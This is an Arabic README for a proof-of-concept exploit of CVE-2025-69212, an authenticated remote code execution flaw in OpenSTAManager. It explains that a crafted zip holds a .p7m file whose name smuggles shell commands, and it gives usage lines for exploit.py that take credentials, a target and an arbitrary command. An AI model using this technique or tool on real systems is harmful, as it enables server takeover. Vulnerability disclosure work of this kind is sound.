
CVE-2025-69212 إثبات المفهوم.
OpenSTAManager هو حل برمجي للإدارة مخصص للدعم الفني والفواتير الإلكترونية والمحاسبة. الإصدارات <=2.9.8 معرضة لثغرة تنفيذ تعليمات برمجية عن بُعد بعد المصادقة. يمكن للمهاجم استغلال هذه المشكلة برفع أرشيف .zip مُصمم خصيصًا يحتوي على ملف .p7m يمكن تفسير اسمه كأوامر شل، مما يؤدي إلى تنفيذ أوامر عشوائية على الخادم البعيد.
$ pip install requests
$ python3 exploit.py [-h] --user USER --password PASSWORD [--target TARGET] [--cmd CMD]
مثال:
$ python3 exploit.py --user="admin" --password="admin" --target="http://example.com/" --cmd="id"
-h, --help show this help message and exit
--user USER username for auth.
--password PASSWORD password for auth.
--target TARGET target domain endpoint
--cmd CMD command to execute on the server